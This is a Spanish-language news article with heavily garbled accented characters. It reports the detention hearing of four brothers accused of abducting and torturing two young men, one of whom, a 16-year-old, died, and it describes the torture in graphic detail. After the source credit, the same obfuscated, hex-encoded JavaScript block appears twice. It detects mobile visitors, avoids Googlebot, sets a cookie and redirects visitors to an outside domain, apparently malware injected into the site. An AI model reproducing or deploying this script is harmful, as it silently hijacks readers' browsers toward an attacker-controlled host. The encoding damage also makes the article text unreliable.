Los hermanos IbA?Ai??ez pasarA?n cuatro meses detenidos

Angel, Marcelo, SebastiA?n y Kevin IbA?Ai??ez fueron imputados ayer por privaciA?n ilegAi??tima de la libertad agravada por haber sido cometida contra un menor de edad, por la pluralidad de partAi??cipes y por la muerte de Alan Nahuelmilla, asAi?? como las lesiones graves causadas al sobreviviente B.G. La imputaciA?n es en carA?cter de coautores de esos delitos, lo que contempla una pena de prisiA?n perpetua.

Se conocieron mA?s detalles de los tormentos que sufrieron las vAi??ctimas. A Nahuelmilla lo arrastraron atado a una camioneta y le pegaron con una pala en la cabeza mientras que a B.G. le cortaron las orejas con un alicate. SegA?n la fiscal Camila Banfi, los imputados registraron todas las torturas en video y al sobreviviente lo liberaron despuAi??s de 8 horas de haberlo golpeado y bajo la amenaza de que no denunciara. El juez Alejandro SoAi??is dijo que nunca vio algo semejante en siete aAi??os de trabajo en la jurisdicciA?n.

La fiscal general Camila Banfi, junto a la funcionaria MarAi??a InAi??s Bartels, fueron las encargadas de presentar ayer, durante la audiencia de control de detenciA?n, la imputaciA?n por la que se investiga a los hermanos Angel (23), SebastiA?n (26), Kevin (19) y Marcelo IbA?Ai??ez (35), bajo la calificaciA?n provisoria de ai???privaciA?n ilegAi??tima de la libertad agravada por haber sido cometida contra un menor de edad, por las lesiones graves causadas a B.G. (19), por la pluralidad de partAi??cipes y por la muerte de Alan Nahuelmilla (16), todos ellos en carA?cter de coautorai???.

La fiscal pidiA? al periodismo que no se publiquen los rostros de los cuatro imputados para no entorpecer la rueda de reconocimiento y optA? por referirse al testigo principal y sobreviviente de las torturas con las iniciales de B.G. ante la repercusiA?n mediA?tica. El juez Alejandro SoAi??is pidiA? colaboraciA?n a los periodistas presentes, entre ellos el equipo de El PatagA?nico y de esa manera se convinieron las medidas para resguardar la investigaciA?n.

Angel IbA?Ai??ez, chofer de un camiA?n del servicio de recolecciA?n de residuos, no supo decir la direcciA?n exacta donde reside en el San Cayetano porque dijo que hace un mes alquila en el lugar. Y dio algunas referencias al juez de cA?mo llegar a la casa en donde reside con su pareja y dos hijos.

Mientras, SebastiA?n IvA?n IbA?Ai??ez dijo que reside en la Zona de Quintas y tampoco pudo dar la precisiA?n de la direcciA?n; solo que vive al costado de un tanque de agua. RelatA? que tambiAi??n es padre y dijo trabajar en la firma petrolera Manpetrol.

Kevin IbA?Ai??ez le relatA? al juez que reside en Los Duraznos 1.650, que es desocupado y que el aAi??o pasado terminA? la secundaria, mientras que Marcelo FabiA?n IbA?Ai??ez, el mayor de los hermanos, dijo residir por el momento en la misma vivienda que Kevin porque estA? arreglando su casa. TambiAi??n trabaja en Manpetrol hace 3 aAi??os y medio.

LA CAPTURA Y LOS TORMENTOS

La fiscal Camila Banfi relatA? el caso por el que se los investiga a los cuatro hermanos. Dijo que el sA?bado, alrededor de las 23, Marcelo FabiA?n, SebastiA?n IvA?n, Kevin Edgardo y A?ngel IbA?Ai??ez junto a una quinta persona aA?n no identificada interceptaron en la calle Miroglio casi Duraznos de zona de Quintas a los jA?venes Alan Nahuelmilla y B.G. con el fin de que les entregaran un televisor que estos habrAi??an sustraAi??do a Marcelo IbA?Ai??ez.

Justamente fue Ai??ste, portando un arma calibre 45, quien se bajA? de una Chevrolet S-10, mientras los otros tres hicieron lo propio de un vehAi??culo oscuro de cinco puertas, todos armados. AsAi?? procedieron a emboscar a las vAi??ctimas, golpearlas y maniatarlas.

Atados con una soga, los arrastraron con la camioneta trasladA?ndolos hasta el domicilio de Marcelo IbA?Ai??ez, en calle Los Duraznos 1.650, mA?s precisamente en el patio exterior de esa vivienda, relatA? la fiscal.

Una vez en el lugar, los sometieron a una serie de golpes, patadas con borceguAi??es en diferentes partes del cuerpo, en la cabeza con una pala y con cachas de las armas, provocA?ndoles cortes. Los desnudaron y les tiraron agua frAi??a con bidones de 20 litros.

A B.G. le cortaron las orejas con un alicate, les pusieron sogas al cuello para ahorcarlos, disparaban al aire y a la vez los amenazaban con matarlos si no decAi??an dA?nde estaba el televisor.

SegA?n la fiscal, Marcelo IbA?Ai??ez llamaba por telAi??fono pidiendo mA?s municiones calibre 45 con el fin de poder darles muerte, mientras registraron en video toda la agresiA?n.

Todo ello ocurriA? en un lapso de cuatro horas. Luego de ese tiempo y siendo alrededor de las 3 del domingo 15 de abril, los imputados se retiraron del lugar junto a Nahuelmilla, a quien por los restos de sangre encontrados en el lugar trasladaron desde Los Duraznos 1.650 hasta los predios de Los Duraznos y Miroglio donde viven SebastiA?n, Kevin y Angel IbA?Ai??ez, para arrastrarlo con un vehAi??culo durante tres cuadras hasta el domicilio de su tAi??o donde lo abandonaron.

Al regresar al lugar, los imputados que aA?n mantenAi??an a B.G. cautivo, continuaron golpeA?ndolo hasta alrededor de las 8, cuando lo liberaron tras intimidarlo con disparos al aire para que no denunciara.

B.G. huyA? hacia su domicilio desde donde fue trasladado al Hospital Regional para ser asistido de sus lesiones de carA?cter grave. Mientras, los familiares de Nahuelmilla que lo habAi??an encontrado malherido en la calle, lo trasladaron al hospital donde ingresA? con riesgo vital y falleciA? a las 17:30 del domingo por traumatismo grave de crA?neo con hemorragia intracerebral a causa de los golpes recibidos.

La fiscal caratulA? provisoriamente el caso bajo los artAi??culos del CA?digo Penal que prevAi??n el delito de privaciA?n ilegAi??tima de la libertad agravada por haber sido cometida contra un menor de edad, por las lesiones graves causadas a una de las vAi??ctimas, por la pluralidad de partAi??cipes y por la muerte de una de las vAi??ctimas. Para todos los involucrados en carA?cter de coautores.

Entre las pruebas que citA? Banfi, existen A?rdenes de allanamiento, la declaraciA?n del sobreviviente que relatA? cA?mo ocurriA? el secuestro y agresiA?n, cuA?ntas personas habrAi??an participado, las caracterAi??sticas fAi??sicas detalladas de cada uno de ellos, manifestando que estarAi??a en condiciones de realizar el reconocimiento en rueda de personas el lunes que viene.

La declaraciA?n de B.G. coincide con la escena del delito, esto es los indicios recolectados, evidencias de rastros de sangre; el secuestro de la camioneta Chevrolet S-10-, las zapatillas de una de las vAi??ctimas que se encontraron en el lugar de cautiverio, rastros en el lugar donde dice el testigo que lo arrastraron y el secuestro de la pala con la que habrAi??an golpeado a Nahuelmilla.

La fiscal considerA? que la calificaciA?n debe tener en cuenta una agresiA?n dolosa a un menor de edad, la gravedad del caso, el carA?cter de las lesiones, el plan previo organizado de la emboscada, la maniobra conjunta y los golpes hacia zonas vitales del cuerpo, como la cabeza, pulmones y abdomen.

Para pedir la prisiA?n preventiva, fundA? el peligro de fuga de los imputados en la expectativa de pena de prisiA?n perpetua. A ello se suma que los imputados se ausentaron intempestivamente de sus domicilios y el peligro de entorpecimiento ya que hay un testigo sobreviviente que el lunes darA? un anticipo jurisdiccional de prueba y el miedo de los vecinos en colaborar ante el temor a represalias. SolicitA? cuatro meses de investigaciA?n y el mismo plazo de prisiA?n preventiva.

Mientras, el defensor Mauro FontAi??Ai??ez dijo que sus asistidos no iban a declarar y que realizaba reserva del derecho de cuestionar la calificaciA?n jurAi??dica. AfirmA? que no estaba acreditado que sus asistidos hayan interceptado a las vAi??ctimas y que tampoco se puede probar que Marcelo IbA?Ai??ez haya llamado pidiendo municiones calibre 45. El defensor sostiene que se tratarAi??a de un homicidio preterintencional, que bajarAi??a considerablemente la expectativa de pena hasta de cumplimiento condicional.

El juez SoAi??is para fundar la apertura de la investigaciA?n tuvo en cuenta el relato fiscal en el que ai???los imputados con pleno conocimiento y voluntad realizaron esta privaciA?n ilegal de la libertad, este secuestro de ambas vAi??ctimas, las sometieron mediante un actuar violento, despiadado y salvaje si se quiere, una violencia inusitada que no ha sido visto por quien les habla por lo menos en los A?ltimos siete aAi??os en esta jurisdicciA?nai???.

El juez dijo que ai???los sometieron a toda clase de tormentos y lesiones, lesiones graves producidas en una de las vAi??ctimas y la muerte producida en otra de las vAi??ctimasai???.

El magistrado decretA? legal la detenciA?n de los hermanos IbA?Ai??ez, considerA? la probabilidad de autorAi??a a los cuatro imputados, dejA? asegurada su defensa tAi??cnica y decretA? la prisiA?n preventiva por cuatro meses. OtorgA? ademA?s el mismo plazo de investigaciA?n.

(Fuente: El Patagonico.)var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}